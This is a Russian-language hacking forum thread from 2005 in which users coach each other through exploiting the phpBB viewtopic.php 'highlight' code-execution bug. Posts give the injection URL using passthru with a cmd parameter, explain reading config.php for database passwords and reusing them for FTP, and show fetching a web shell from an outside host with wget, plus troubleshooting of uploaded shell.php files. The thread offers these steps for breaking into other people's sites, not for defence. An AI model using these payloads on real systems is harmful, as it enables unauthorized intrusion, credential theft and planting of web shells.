ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2005, 15:51
|
|
Новичок
Регистрация: 03.07.2005
Сообщений: 5
Провел на форуме:
0
Репутация:
0
|
|
Можешь дать номер своей аськи?
|
|
|
03.07.2005, 16:01
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Нет
Пиши в ПМ, если что-то беспокоит..
|
|
|
|
04.07.2005, 23:19
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Такое дело. Шелл вроде я залил,
Код:
rw-r--r-- 1 u3603347 ftpusers 43265 Jun 30 17:38 search.php
rw-r--r-- 1 u3603347 ftpusers 0 Jul 4 14:32 shell.php
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.1
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.2
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.3
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.4
rw-r--r-- 1 u3603347 ftpusers 2958 Jul 4 14:32 shell.php.5
rwxr-xr-x 6 u3603347 ftpusers 4096 Jun 30 17:38 templates
rw-r--r-- 1 u3603347 ftpusers 5 Jul 4 01:26 test.txt
rw-r--r-- 1 u3603347 ftpusers 691 Nov 21 2004 update.php
rw-r--r-- 1 u3603347 ftpusers 23154 Oct 19 2004 viewforum.php
rw-r--r-- 1 u3603347 ftpusers 7233 May 9 19:42 viewonline.php
rw-r--r-- 1 u3603347 ftpusers 45228 May 9 19:42 viewtopic.php
Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так? |
|
|
|
06.07.2005, 03:03
|
|
Новичок
Регистрация: 10.06.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Rebz
Dragunov, максимум что ты получишь - пароли от БД. =))
их получаешь из следующей команды:
viewtopic.php?t=123[вместо 123 подставляешь свой номер топика]&cmd=cat%20config.php&highlight='.passthru($HTTP_G ET_VARS[cmd]).'
Запустил? Ничего не появилось?  ) Правильно)). Далее просмотри html-сорс странички и ты наткнёшься там на примерно это:
<?php
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = '*********';
$dbuser = '*******';
$dbpasswd = '*****';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Вместо звёздочек, понятное дело, будут данные.. вот их и юзай. попробуй для ФТП попробовать логин и пароль.
для заливки шелла юзаем команду wget. Синаксис:
wget http://shell.narod.ru/shell.php
Пишем это дело в cmd в урле.
Даливайте шелл только в ту папку, куда позволяют права. Чтобы узнать какие права в папочке, юзайте команду ls -la.
cmd=ls -la;wget http:// ....
вот приблизительно так должно получиться)).
Переходить в др. директории командой cd.
зы: можно писать несколько команд через точку с запятой. Привет, у меня немного по-другому исчезает само сообщение на странице т.е там где текст ничего нету, но в сорсе кода тоже ничего не отображает, в чем может быть дело ?
|
|
|
|
06.07.2005, 03:09
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
Azazel, а ты права доступа взглянул?? ) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..
Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..! |
|
|
|
07.07.2005, 21:45
|
|
Новичок
Регистрация: 10.06.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Rebz
Azazel, а ты права доступа взглянул?? ) Видимо, нет..
rwxr-xr-x - недостаточно прав..
про другие я и не говорю..
Felix, ну ты проверь сначала, работает ли сама бага.. если да, то вышеуказанный пример точно должен быть =). Ведь ты всего лишь просматриваешь файл.. и содерживое в нём должно просматриваться..!
Походу уязвим т.к когда я начинаю задавать какие либо параметры, от форума остается только шапка, но ничего не выполняется и следовательно не выводиться тоже как быть, мот кто встречал ??
|
|
|
|
07.07.2005, 22:06
|
|
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282
Репутация:
112
|
|
Я вот пишу: _http://saitik/forum/viewtopic.php?t=7&highlight=%27.passthru($HTTP_GET _VARS[cmd]).%27&cmd=ls ../../;ls%20-la Он не показывает права на папки, что не так? Да и где-то читал, что нада посмореть качалку, которая стоит на сайте, как и где это зделать?
|
|
|
|
07.07.2005, 22:30
|
|
Новичок
Регистрация: 06.05.2005
Сообщений: 11
Провел на форуме:
7371
Репутация:
0
|
|
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
|
|
|
|
07.07.2005, 23:40
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
>>Использую Putty чтоб подконектиться, а он мне Access Denied. Что ж может быть не так?
=))))))))) лооооол это веб шел...набивай адрес в урл
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
08.07.2005, 00:09
|
|
Постоянный
Регистрация: 03.03.2005
Сообщений: 351
Провел на форуме:
1120282
Репутация:
112
|
|
Сообщение от nopmoc
надо прописовать параметры -la:
ls ../../ -la;
тогда будет с правами.
А не прокатывает =( Выдает вот так:
../../:
cgi-bin
cgi-bin-dist
data
data-dist
error
error-dist
icons
icons-dist
И всё... ну что ещё мона зделать...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
